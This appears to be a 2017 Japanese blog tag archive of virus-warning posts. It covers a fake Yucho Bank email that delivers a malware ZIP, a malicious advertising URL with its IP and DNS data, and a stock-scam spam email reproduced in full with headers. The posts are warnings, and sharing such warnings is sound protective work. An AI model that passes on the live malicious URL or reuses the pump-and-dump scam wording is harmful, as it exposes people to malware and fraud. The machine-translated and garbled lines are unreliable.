「ウィルス」タグアーカイブ

知らないって事, 興味ごと(゜_゜>)_:interest, 迷惑な出来事

ゆうちょ銀行やインターネットバンキングをかたる不審なメールに注意ですと

ゆうちょ銀行をかたるウイルスメールが拡散中ですと

ウイルスをダウンロードさせるメールが拡散中。
件名は『ゆうちょ銀行 入金のご連絡 (N71019788477G)』。
実在の会社を装っていますが、本文中のリンクをクリックしてダウンロードされるファイルはウイルスです。ご注意ください。
とのこと。
SnapCrab_NoName_2017-11-22_0-57-23_No-00

SnapCrab_NoName_2017-11-22_0-58-13_No-00
メールの送信日は11月20日で、件名は「ゆうちょ銀行入金のご連絡(N71019788477G)」。ゆうちょ銀行からの入金連絡メールを装い、記載されたリンクをクリックするとウイルス付きZIPファイルをダウンロードするサイトにアクセスする。
ゆうちょ銀行をかたるウイルスメール(JC3の注意喚起情報ページより)

If “virus mail” handing over “Yucho Bank” is spreading

Mail that spreads “download virus” is spreading.
The subject is “contact Yucho Bank payment (N 71019788477 G)”.
Although it pretends as a real company, the file downloaded by clicking the link in the text is a virus. Please be careful.
And that.

The sending date of the e-mail is November 20, the subject is “Contact of Japan Post Bank payment (N 71019788477 G)”.
Just as Japan Post Bank pretends to be a deposit contact mail, click the indicated link to access the site to download the virus-attached ZIP file.
Virus mail that hits Yucho Bank
0 0 payrence closed tw payrence tw payrence closed tw payday closed tw payrence closed tw payrence payrence tw payrence payrence tw payrence payrence payday tw payrence payrence tw

詳細
https://www.jc3.or.jp/topics/virusmail.html

http://www.jp-bank.japanpost.jp/crime/crm_email.html

知らないって事, 興味ごと(゜_゜>)_:interest, 迷惑な出来事

このような表示はウィルスが実機に入るので消しましょう!

広告に含んでいてたまたま出てきたので
ようやく捉える事が出来ました。
これですね
SnapCrab_NoName_2017-8-12_6-51-18_No-00
サイトはここです。
http://b.csmfnkmubuddy.download/111446/1530/k3p/l0ar6wc

公開されているのは、プロクシ経由なのでddns経由でしょう
ここからを閉鎖すればちょっとは防げるかも
csmfnkmubuddy.download
check status or track your website traffic with Mobile Tracker
Domain IP Address:
178.175.130.163
Update SEO Report:

Enter to update SEO:
Proxy Server IP:
The proxy server IP address has been assigned to the GEO DB Record
Internet service provider:
I.C.S. Trabia-Network S.R.L.
Organization:
trabia network
Country ISO alpha-2 code:
anonymous proxy
State:
Municipiul Chisinau
City:
Chisinau
Timezone:
Europe/Chisinau
Longitude:
28.8575
Latitude:
47.0056
WHOIS last updated:
new WHOIS data is currently unavailable for all requests [GL3001-3000]. Try again in 2 hours, 2 min.
Forward DNS primary host:
eforward4.registrar-servers.com
Forward DNS expanded data:
csmfnkmubuddy.download has address 178.175.130.163
csmfnkmubuddy.download mail is handled by 10 eforward1.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 10 eforward2.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 10 eforward3.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 20 eforward5.registrar-servers.com.
csmfnkmubuddy.download mail is handled by 15 eforward4.registrar-servers.com.
Forward DNS last updated:
0 seconds ago on August 11, 2017, 9:57 pm GMT Time
Forward DNS next check:
in 5 months, 29 days on August 11, 2017, 9:57 pm GMT Time
Reverse DNS in-addr.arpa:
No valid reverse DNS record has been found at this time.
Reverse DNS last updated:
0 seconds ago on August 11, 2017, 9:57 pm GMT Time
Reverse DNS next check:
in 1 day on August 11, 2017, 9:57 pm GMT Time

迷惑な出来事

件名:In less than 5 days this company could yield you a ten baggerは迷惑メールです。

コメントする

PHPMailerを利用した迷惑メールです。
本当に多いですね。Outlookなど、HTMLメールを受け取るようなメーラはやめたほうがいいですね。
ウィルスが入らないようにするには、プレーンテキストで受け取るかHTMLのスクリプトを抹消させて受け取るかだろうね。
サーバサイドでスクリプトを強制的に抹消させているので一切入らないからいいが。
当然メールの形態は崩れるけど、要は、そんなメールを送ってくるポリシーが良くわからん。
マルウェアのほとんどが、こういったリッチテキストがらみあほ

件名
Subject: In less than 5 days this company could yield you a ten bagger
差出人
“Mallory Hill”
返信先

宛先
自メール
内容

Good morning!
I’ve beeninvolved in the markets for a few decades now and I’ll be the first totell you that things have never been as uncertain as they are today.
With a new administration heading our country, it’s becomingincreasingly difficult to get the edge in the markets.
At least, we can always count on lady luck to come in handy when weneed her.
A friend of mine founded a small medical company a few years ago and hehas been researching a novel way of using the immune system to killtumors.
After extensive tests and lengthy approval processes, he finally gotthe green light on this life changing new therapy.
Because of that, a big pharma has put in an offer to buy out the entirecompany. At essentially 10 times the current trading value.
This guarantees that if you get shares today at under 20 cents each,you will cash out ten times that amount by Friday.
The ticker which you need to use to buy is the first letter of each ofthese words:
Quest, Start, Mega, Great
Together they make up the 4 letter symbol which you need. Get in asfast as you can before the price jumps.

添付ファイル
なし
———————————————
ソース
From – Tue Jun 20 08:1 2017
X-Account-Key:
X-UIDL:
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path:
X-Original-To: @
Delivered-To: @
Received: from net-2-38-28-138.cust.vodafonedsl.it (net-2-38-28-138.cust.vodafonedsl.it [2.38.28.138])
by mail. (Postfix) with ESMTP id D97F834CA1B6
for <@>; Mon, 19 Jun 2017 19: +0900 (JST)
Received: (from apache@localhost)
by recoveryflash.net (8.14.7/8.14.7/Submit) id ;
Mon, 19 Jun 2017 12: +0200
Date: Mon, 19 Jun 2017 12: +0200
To: @
From: “Mallory Hill”
Subject: In less than 5 days this company could yield you a ten bagger
Message-ID: <@recoveryflash.net>
X-Priority: 3
X-Mailer: PHPMailer 5.2.8 (https://github.com/PHPMailer/PHPMailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=”b1_”
Content-Transfer-Encoding: 8bit
X-EsetId:

–b1_
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Good morning!

I’ve beeninvolved in the markets for a few decades now and I’ll be the first totell you that things have never been as uncertain as they are today.

With a new administration heading our country, it’s becomingincreasingly difficult to get the edge in the markets.

At least, we can always count on lady luck to come in handy when weneed her.

———————————————
添付なし
———————————————
IPv4 address:

2.38.28.138
IPv4 expanded:

002.038.028.138
IPv4 decimal:

36052106
Internet service provider:
Vodafone Italia DSL
Organization:
Vodafone Italia DSL
Country name:
Italy
Country ISO alpha-2 code:
IT
State:
The Marches
City:
Colbuccaro
Timezone:
Europe/Rome
Longitude:
13.4436
Latitude:
43.2446
WHOIS last updated:
WHOIS data frequency request limit is reached. Try again later.
Update WHOIS data:

Enter to update WHOIS:
Reverse DNS host:
vodafonedsl.it
Reverse DNS pointer:
net-2-38-28-138.cust.vodafonedsl.it
Reverse DNS in-addr.arpa:
138.28.38.2.in-addr.arpa domain name pointer net-2-38-28-138.cust.vodafonedsl.it.
Reverse DNS last updated:
0 seconds ago on June 20, 2017, 12:38 am GMT Time
Reverse DNS next check:
in 5 months, 29 days on June 20, 2017, 12:38 am GMT Time
Update DNS Records:

Enter to update DNS:
Bot/spider
No
———————————————
Domain Name:
recoveryflash.net
Check status
Page Response:
39.76 (ms)
Website Ranking:

Facebook1
SEO Report Time:
Created: 0 seconds ago, Updated: 0 seconds ago
Update SEO Report:

Enter to update SEO:
Meta Tags:

Title mŋr_CGbgTȂ猩ȂƑIm2017N0602 XVn
Viewport width=device-width, initial-scale=1
Internet service provider:
K-Opticom Corporation
Organization:
K-Opticom Corporation
Country name:
Japan
Country ISO alpha-2 code:
JP
State:
Nara
City:
Nara
Timezone:
Asia/Tokyo
Longitude:
135.8328
Latitude:
34.6853
WHOIS last updated:
WHOIS data frequency request limit is reached. Try again later.
Update WHOIS data:

Enter to update WHOIS:
Forward DNS primary host:
recoveryflash.net
Forward DNS expanded data:
recoveryflash.net has address 59.190.130.26
recoveryflash.net mail is handled by 0 recoveryflash.net.
Forward DNS last updated:
0 seconds ago on June 20, 2017, 12:27 am GMT Time
Forward DNS next check:
in 5 months, 29 days on June 20, 2017, 12:27 am GMT Time
Reverse DNS host:
Pending reverse DNS update…
———————————————